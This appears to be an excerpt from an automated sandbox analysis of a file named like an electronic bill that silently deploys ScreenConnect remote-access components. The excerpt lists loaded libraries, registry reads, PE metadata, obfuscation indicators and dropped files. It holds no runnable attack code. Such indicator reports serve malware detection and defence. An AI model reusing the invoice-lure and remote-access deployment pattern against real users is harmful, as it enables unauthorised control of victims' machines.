Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Section loaded: netapi32.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Section loaded: samcli.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Section loaded: samlib.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Section loaded: wintypes.dll

Source: C:\Users\user\Desktop\E_BILL9926378035.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00020420-0000-0000-C000-000000000046}\InprocServer32

Jump to behavior

Reads internet explorer settings

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings

Jump to behavior

Found graphical window changes (likely an installer)

Source: Window Recorder

Window detected: More than 3 window changes detected

Uses Microsoft Silverlight

Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

PE / OLE file has a valid certificate

Source: E_BILL9926378035.exe

Static PE information: certificate valid

PE file contains a mix of data directories often seen in goodware

Source: E_BILL9926378035.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: E_BILL9926378035.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: E_BILL9926378035.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: E_BILL9926378035.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: E_BILL9926378035.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: E_BILL9926378035.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Contains modern PE file flags such as dynamic base (ASLR) or NX

Source: E_BILL9926378035.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

PE file contains a debug data directory

Source: E_BILL9926378035.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Binary contains paths to debug symbols

Source:	Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdbU source: dfsvc.exe, 00000001.00000002.2591740664.000001F6B60E0000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2591740664.000001F6B60C8000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2591740664.000001F6B5D5E000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1933686059.0000000002CF2000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.Client.dll.1.dr, ScreenConnect.Client.dll0.1.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\ClickOnceRunner\Release\ClickOnceRunner.pdb source: E_BILL9926378035.exe
Source:	Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: dfsvc.exe, 00000001.00000002.2591740664.000001F6B5D5A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2591740664.000001F6B60E0000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2591740664.000001F6B60C4000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000A.00000002.1932338060.0000000004EF2000.00000002.00000001.01000000.0000000E.sdmp, ScreenConnect.WindowsClient.exe, 0000000C.00000002.1990094462.0000000002641000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000C.00000002.1989776192.0000000000C20000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.ClientService.dll.1.dr, ScreenConnect.ClientService.dll0.1.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdbe source: ScreenConnect.WindowsClient.exe, 00000009.00000000.1916214053.0000000000AC2000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr
Source:	Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 0000000A.00000000.1921269571.0000000000C9D000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: dfsvc.exe, 00000001.00000002.2591740664.000001F6B60E0000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2591740664.000001F6B60C0000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2591740664.000001F6B5D56000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1935970610.000000001BD52000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Windows.dll0.1.dr, ScreenConnect.Windows.dll.1.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 00000009.00000000.1916214053.0000000000AC2000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdbW] source: dfsvc.exe, 00000001.00000002.2591740664.000001F6B60E0000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2591740664.000001F6B60C0000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2591740664.000001F6B5D56000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1935970610.000000001BD52000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Windows.dll0.1.dr, ScreenConnect.Windows.dll.1.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: dfsvc.exe, 00000001.00000002.2591740664.000001F6B60E0000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2591740664.000001F6B60C8000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2591740664.000001F6B5D5E000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1933686059.0000000002CF2000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.Client.dll.1.dr, ScreenConnect.Client.dll0.1.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: dfsvc.exe, 00000001.00000002.2591740664.000001F6B5D4E000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000A.00000002.1932439482.0000000004FA2000.00000002.00000001.01000000.0000000F.sdmp, ScreenConnect.Core.dll.1.dr, ScreenConnect.Core.dll0.1.dr

PE file contains a valid data directory to section mapping

Source: E_BILL9926378035.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: E_BILL9926378035.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: E_BILL9926378035.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: E_BILL9926378035.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: E_BILL9926378035.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

Binary contains a suspicious time stamp

Source: ScreenConnect.WindowsFileManager.exe.1.dr

Static PE information: 0xBBA7DA50 [Mon Oct 7 02:49:52 2069 UTC]

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\E_BILL9926378035.exe

0_2_00EF1000

PE file contains an invalid checksum

Source: E_BILL9926378035.exe

Static PE information: real checksum: 0x1bda6 should be: 0x1e679

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\E_BILL9926378035.exe	Code function: 0_2_00EF1BC0 push ecx; ret	0_2_00EF1BD3
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Code function: 1_2_00007FFD9B77D2A5 pushad ; iretd	1_2_00007FFD9B77D2A6
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Code function: 1_2_00007FFD9B8B5E3E push cs; retf	1_2_00007FFD9B8B5E3F
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Code function: 1_2_00007FFD9B8A8D61 push 8B495CB5h; iretd	1_2_00007FFD9B8A8D6C
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Code function: 1_2_00007FFD9B897D00 push eax; retf	1_2_00007FFD9B897D1D
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Code function: 1_2_00007FFD9B89842E pushad ; ret	1_2_00007FFD9B89845D
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Code function: 1_2_00007FFD9B8900BD pushad ; iretd	1_2_00007FFD9B8900C1
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Code function: 1_2_00007FFD9B89845E push eax; ret	1_2_00007FFD9B89846D
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Code function: 9_2_00007FFD9B894162 push eax; ret	9_2_00007FFD9B894163
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Code function: 9_2_00007FFD9B8930BA push eax; iretd	9_2_00007FFD9B8930BB
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Code function: 9_2_00007FFD9B89401A push eax; iretd	9_2_00007FFD9B89401B
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Code function: 9_2_00007FFD9B892FDA pushad ; retf	9_2_00007FFD9B892FDB
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Code function: 9_2_00007FFD9B893F3A pushad ; retf	9_2_00007FFD9B893F3B
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Code function: 9_2_00007FFD9B892E18 push eax; ret	9_2_00007FFD9B892E7B
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Code function: 12_2_00007FFD9BBA7F7A push ebx; retn FD9Bh	12_2_00007FFD9BBA7FEA
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Code function: 12_2_00007FFD9BBA1449 push ecx; iretd	12_2_00007FFD9BBA144A
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Code function: 12_2_00007FFD9BBA13ED push edx; iretd	12_2_00007FFD9BBA13EE
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Code function: 12_2_00007FFD9BBA9C1B push ss; ret	12_2_00007FFD9BBA9C1C
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Code function: 12_2_00007FFD9BBA1391 push edx; iretd	12_2_00007FFD9BBA1392
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Code function: 12_2_00007FFD9BBA9321 push ss; ret	12_2_00007FFD9BBA9322
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Code function: 12_2_00007FFD9BBA127D push ebx; iretd	12_2_00007FFD9BBA127E
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Code function: 12_2_00007FFD9BBA1199 push esp; iretd	12_2_00007FFD9BBA119A
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Code function: 12_2_00007FFD9BBAB136 push edx; ret	12_2_00007FFD9BBAB137
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Code function: 12_2_00007FFD9BBAB0ED push ecx; ret	12_2_00007FFD9BBAB0EE
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Code function: 12_2_00007FFD9BBA58A7 push ss; iretd	12_2_00007FFD9BBA58B5
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Code function: 12_2_00007FFD9BBA781D push cs; ret	12_2_00007FFD9BBA7822
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Code function: 12_2_00007FFD9BBA7824 push cs; ret	12_2_00007FFD9BBA782C
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Code function: 12_2_00007FFD9BBA782E push cs; ret	12_2_00007FFD9BBA7822
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Code function: 12_2_00007FFD9BBA776C push es; ret	12_2_00007FFD9BBA779A
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Code function: 12_2_00007FFD9BBA775C push es; ret	12_2_00007FFD9BBA779A
Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe	Code function: 12_2_00007FFD9BBA9624 push ebx; ret	12_2_00007FFD9BBA9632

Persistence and Installation Behavior

Drops PE files

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\Local\Temp\Deployment\D4CKD0XW.3MP\NK1E9WBX.DD7\ScreenConnect.WindowsFileManager.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\Local\Temp\Deployment\D4CKD0XW.3MP\NK1E9WBX.DD7\ScreenConnect.Core.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a\ScreenConnect.Client.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\Local\Temp\Deployment\D4CKD0XW.3MP\NK1E9WBX.DD7\ScreenConnect.WindowsClient.exe	Jump to dropped file
